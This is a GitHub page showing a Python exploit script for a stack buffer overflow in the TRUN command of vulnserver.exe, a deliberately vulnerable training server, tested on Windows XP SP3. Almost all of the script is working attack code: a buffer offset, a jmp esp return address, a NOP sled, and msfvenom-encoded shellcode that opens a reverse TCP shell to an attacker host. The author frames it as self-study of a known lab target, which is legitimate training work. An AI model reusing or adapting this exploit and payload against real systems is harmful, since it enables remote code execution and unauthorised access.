-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathvulnserver_trun_bof.py
74 lines (65 loc) · 2.92 KB
/
vulnserver_trun_bof.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/env python
#################################
# Stack buffer overflow of 'TRUN' command on vulnserver.exe
# http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
#
# Author: Bengman
#
# Tested on: Win XP SP3
# Badchars: \x00
#
# This was developed for my own educational purposes
# I did not discover the vulnerability
#################################
import socket
import struct
import sys
offset = 2006 # ret overwrite at 2006 bytes into buffer
ret = struct.pack('<L', 0x625011AF) # jmp esp in essfunc.dll
nopsled = "\x90"*20
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 -e x86/shikata_ga_nai -b "\x00" -f python -v shellcode
# Payload size: 351 bytes
shellcode = ""
shellcode += "\xbd\x67\x90\xaf\x43\xda\xc1\xd9\x74\x24\xf4\x58"
shellcode += "\x2b\xc9\xb1\x52\x31\x68\x12\x83\xc0\x04\x03\x0f"
shellcode += "\x9e\x4d\xb6\x33\x76\x13\x39\xcb\x87\x74\xb3\x2e"
shellcode += "\xb6\xb4\xa7\x3b\xe9\x04\xa3\x69\x06\xee\xe1\x99"
shellcode += "\x9d\x82\x2d\xae\x16\x28\x08\x81\xa7\x01\x68\x80"
shellcode += "\x2b\x58\xbd\x62\x15\x93\xb0\x63\x52\xce\x39\x31"
shellcode += "\x0b\x84\xec\xa5\x38\xd0\x2c\x4e\x72\xf4\x34\xb3"
shellcode += "\xc3\xf7\x15\x62\x5f\xae\xb5\x85\x8c\xda\xff\x9d"
shellcode += "\xd1\xe7\xb6\x16\x21\x93\x48\xfe\x7b\x5c\xe6\x3f"
shellcode += "\xb4\xaf\xf6\x78\x73\x50\x8d\x70\x87\xed\x96\x47"
shellcode += "\xf5\x29\x12\x53\x5d\xb9\x84\xbf\x5f\x6e\x52\x34"
shellcode += "\x53\xdb\x10\x12\x70\xda\xf5\x29\x8c\x57\xf8\xfd"
shellcode += "\x04\x23\xdf\xd9\x4d\xf7\x7e\x78\x28\x56\x7e\x9a"
shellcode += "\x93\x07\xda\xd1\x3e\x53\x57\xb8\x56\x90\x5a\x42"
shellcode += "\xa7\xbe\xed\x31\x95\x61\x46\xdd\x95\xea\x40\x1a"
shellcode += "\xd9\xc0\x35\xb4\x24\xeb\x45\x9d\xe2\xbf\x15\xb5"
shellcode += "\xc3\xbf\xfd\x45\xeb\x15\x51\x15\x43\xc6\x12\xc5"
shellcode += "\x23\xb6\xfa\x0f\xac\xe9\x1b\x30\x66\x82\xb6\xcb"
shellcode += "\xe1\x6d\xee\xeb\xf0\x05\xed\x0b\xe2\x89\x78\xed"
shellcode += "\x6e\x22\x2d\xa6\x06\xdb\x74\x3c\xb6\x24\xa3\x39"
shellcode += "\xf8\xaf\x40\xbe\xb7\x47\x2c\xac\x20\xa8\x7b\x8e"
shellcode += "\xe7\xb7\x51\xa6\x64\x25\x3e\x36\xe2\x56\xe9\x61"
shellcode += "\xa3\xa9\xe0\xe7\x59\x93\x5a\x15\xa0\x45\xa4\x9d"
shellcode += "\x7f\xb6\x2b\x1c\x0d\x82\x0f\x0e\xcb\x0b\x14\x7a"
shellcode += "\x83\x5d\xc2\xd4\x65\x34\xa4\x8e\x3f\xeb\x6e\x46"
shellcode += "\xb9\xc7\xb0\x10\xc6\x0d\x47\xfc\x77\xf8\x1e\x03"
shellcode += "\xb7\x6c\x97\x7c\xa5\x0c\x58\x57\x6d\x3c\x13\xf5"
shellcode += "\xc4\xd5\xfa\x6c\x55\xb8\xfc\x5b\x9a\xc5\x7e\x69"
shellcode += "\x63\x32\x9e\x18\x66\x7e\x18\xf1\x1a\xef\xcd\xf5"
shellcode += "\x89\x10\xc4"
payload = "A"*offset + ret + nopsled + shellcode + "C"*(3000-offset-4-20-len(shellcode))
try:
# connect to target
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect(('192.168.56.101',666))
print "[+] Sending payload to target"
s.recv(1024)
s.send('TRUN .' + payload)
s.recv(1024)
s.close
except:
print "Unable to connecto to target...crashed?"
sys.exit(0)